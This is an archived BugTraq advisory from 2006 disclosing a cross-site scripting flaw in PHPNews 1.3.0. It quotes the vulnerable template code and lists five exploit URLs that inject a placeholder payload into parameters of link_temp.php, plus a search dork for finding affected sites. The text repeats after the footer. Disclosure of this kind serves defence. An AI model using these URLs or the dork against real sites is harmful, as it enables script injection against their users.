BugTraq
Back to list
|
Post reply
PHPNews 1.3.0 XSS
Dec 01 2006 08:57PM
emulamex hotmail com
PHP Script: PHPNews 1.3.0
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews
-----
- Vulnerable Code:
<?php
print<<<EOT
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />
-----
- Exploits:
http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
Class: XSS
Website: http://newsphp.sourceforge.net
Found by: Detefix
dork: inurl:phpnews
-----
- Vulnerable Code:
<?php
print<<<EOT
<a href="$url?action=fullnews&showcomments=1&id=$id">$subject</a> by $username on $time<br />
-----
- Exploits:
http://[target]/[path-to-PHPNews]/templates/link_temp.php?url=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?id=">[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?subject=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?username=[XSS]
http://[target]/[path-to-PHPNews]/templates/link_temp.php?time=[XSS]
[ reply ]